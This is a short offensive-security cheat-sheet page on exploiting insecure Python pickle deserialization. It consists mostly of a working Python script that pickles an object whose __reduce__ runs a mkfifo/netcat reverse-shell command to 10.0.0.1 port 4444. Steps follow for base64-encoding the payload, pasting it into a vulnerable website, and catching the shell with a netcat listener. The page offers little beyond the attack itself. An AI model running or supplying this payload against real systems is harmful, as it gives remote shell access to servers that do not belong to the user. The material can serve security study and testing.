Python Pickle RCE
Last modified: 2023-08-10
The python “pickle” module, that serializes and deserializes a Python object, is vulnerable to remote code execution. If the website uses this module, we may be able to execute arbitrary code.
Below is the Python script (
mypickle.py) to generate the payload to reverse shell.
import pickle import base64 import os class RCE: def __reduce__(self): cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4444 > /tmp/f') return os.system, (cmd,) if __name__ == '__main__': pickled = pickle.dumps(RCE()) print(base64.b64encode(pickled)) # or print(base64.urlsafe_b64encode(pickled))
Now run this script to generate the Base64 payload.
Copy the ourput base64 string and paste it to where the payload affects in website.
Before reloading the web page, start a listener in local machine.
nc -lvnp 4444
Then reload the page. We should get a shell in local terminal.